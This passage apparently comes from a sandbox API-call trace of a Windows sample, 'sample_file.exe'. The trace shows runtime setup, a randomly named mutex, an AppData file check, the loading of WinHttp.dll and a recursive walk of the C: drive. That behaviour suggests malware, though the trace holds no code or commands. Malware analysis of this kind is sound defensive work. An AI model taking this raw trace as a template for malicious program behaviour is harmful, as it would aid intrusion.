lpProcName="LCMapStringEx") returned 0x7699f72b [0037.870] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ镙ĞĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0037.870] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ镙ĞĀ", cchSrc=256, lpDestStr=0x1cee18, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0037.870] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x1cf7ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf7\x8d\xe2\x4b\x28\xfa\x1c", lpUsedDefaultChar=0x0) returned 256 [0037.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf8ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf8ec, cbMultiByte=256, lpWideCharStr=0x1cf048, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.870] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0037.870] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1cee38, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0037.870] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x1cf6ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf7\x8d\xe2\x4b\x28\xfa\x1c", lpUsedDefaultChar=0x0) returned 256 [0037.870] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1209910, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\sample_file.exe" (normalized: "c:\\users\\eebsym5\\desktop\\sample_file.exe")) returned 0x28 [0037.870] RtlInitializeSListHead (in: ListHead=0x12095c8 | out: ListHead=0x12095c8) [0037.870] GetLastError () returned 0x0 [0037.870] SetLastError (dwErrCode=0x0) [0037.870] GetEnvironmentStringsW () returned 0x375300* [0037.870] FreeEnvironmentStringsW (penv=0x375300) returned 1 [0037.871] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0037.871] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0037.871] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0037.871] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0037.871] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x76963879 [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="InitOnceExecuteOnce") returned 0x76959601 [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventExW") returned 0x769124d8 [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="CreateSemaphoreW") returned 0x7694db8b [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="CreateSemaphoreExW") returned 0x76942111 [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="CreateThreadpoolTimer") returned 0x7694b009 [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadpoolTimer") returned 0x772589be [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7724c02a [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="CloseThreadpoolTimer") returned 0x7724c0d2 [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="CreateThreadpoolWait") returned 0x76943f78 [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadpoolWait") returned 0x77258bfb [0037.872] GetProcAddress (hModule=0x76910000, lpProcName="CloseThreadpoolWait") returned 0x7724b567 [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="FlushProcessWriteBuffers") returned 0x77275998 [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77242251 [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessorNumber") returned 0x772428f6 [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="CreateSymbolicLinkW") returned 0x76999aa9 [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentPackageId") returned 0x0 [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount64") returned 0x7694eb4e [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="GetFileInformationByHandleEx") returned 0x769538ad [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="SetFileInformationByHandle") returned 0x76948d0f [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0037.873] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="InitializeSRWLock") returned 0x77289981 [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="AcquireSRWLockExclusive") returned 0x7728334e [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77261801 [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseSRWLockExclusive") returned 0x77283324 [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableSRW") returned 0x769423f5 [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="CreateThreadpoolWork") returned 0x769489f2 [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="SubmitThreadpoolWork") returned 0x772426a9 [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="CloseThreadpoolWork") returned 0x77242111 [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringEx") returned 0x7696ebc6 [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoEx") returned 0x769453a5 [0037.874] GetProcAddress (hModule=0x76910000, lpProcName="LCMapStringEx") returned 0x7699f72b [0037.875] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0037.875] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x11cddd5) returned 0x0 [0037.876] GetCurrentThread () returned 0xfffffffe [0037.876] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x1cfa54, lpExitTime=0x1cfa5c, lpKernelTime=0x1cfa5c, lpUserTime=0x1cfa5c | out: lpCreationTime=0x1cfa54, lpExitTime=0x1cfa5c, lpKernelTime=0x1cfa5c, lpUserTime=0x1cfa5c) returned 1 [0037.876] RtlInitializeSListHead (in: ListHead=0x1209678 | out: ListHead=0x1209678) [0037.878] RtlInitializeConditionVariable (in: ConditionVariable=0x120a80c | out: ConditionVariable=0x120a80c) [0037.878] GetStartupInfoW (in: lpStartupInfo=0x1cfa48 | out: lpStartupInfo=0x1cfa48*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\sample_file.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0037.878] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="hoJUpcvgHA") returned 0x0 [0037.879] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="hoJUpcvgHA") returned 0x58 [0037.879] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x120a5f8 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x0 [0038.487] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MeGEZan.VDE" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\megezan.vde"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0038.488] GetLogicalDrives () returned 0x4 [0038.488] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.488] GetDiskFreeSpaceW (in: lpRootPathName="C:\\", lpSectorsPerCluster=0x0, lpBytesPerSector=0x0, lpNumberOfFreeClusters=0x0, lpTotalNumberOfClusters=0x0 | out: lpSectorsPerCluster=0x0, lpBytesPerSector=0x0, lpNumberOfFreeClusters=0x0, lpTotalNumberOfClusters=0x0) returned 1 [0038.488] LoadLibraryW (lpLibFileName="WinHttp.dll") returned 0x6fd40000 [0038.666] FindFirstFileW (in: lpFileName="c:\\\\*", lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 0x3788e0 [0038.666] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.672] GetFileAttributesExW (in: lpFileName="c:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), fInfoLevelId=0x0, lpFileInformation=0x1cf714 | out: lpFileInformation=0x1cf714*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cdb0de4, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x5cdb0de4, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x54e43b7c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x18)) returned 1 [0038.675] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.675] FindFirstFileW (in: lpFileName="c:\\boot\\\\*", lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 0x379d88 [0038.675] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.675] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.675] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.675] GetFileAttributesExW (in: lpFileName="c:\\boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), fInfoLevelId=0x0, lpFileInformation=0x1cf1b4 | out: lpFileInformation=0x1cf1b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5650d820, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x5650d820, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x5359eb50, ftLastWriteTime.dwHighDateTime=0x1d4201c, nFileSizeHigh=0x0, nFileSizeLow=0x6400)) returned 1 [0038.676] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.676] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.676] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.676] GetFileAttributesExW (in: lpFileName="c:\\boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), fInfoLevelId=0x0, lpFileInformation=0x1cf1b4 | out: lpFileInformation=0x1cf1b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x553f1a00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x553f1a00, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x553f1a00, ftLastWriteTime.dwHighDateTime=0x1d2da3e, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0038.676] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.677] FindFirstFileW (in: lpFileName="c:\\boot\\cs-cz\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.681] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.682] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.682] GetFileAttributesExW (in: lpFileName="c:\\boot\\cs-cz\\bootmgr.exe.mui" (normalized: 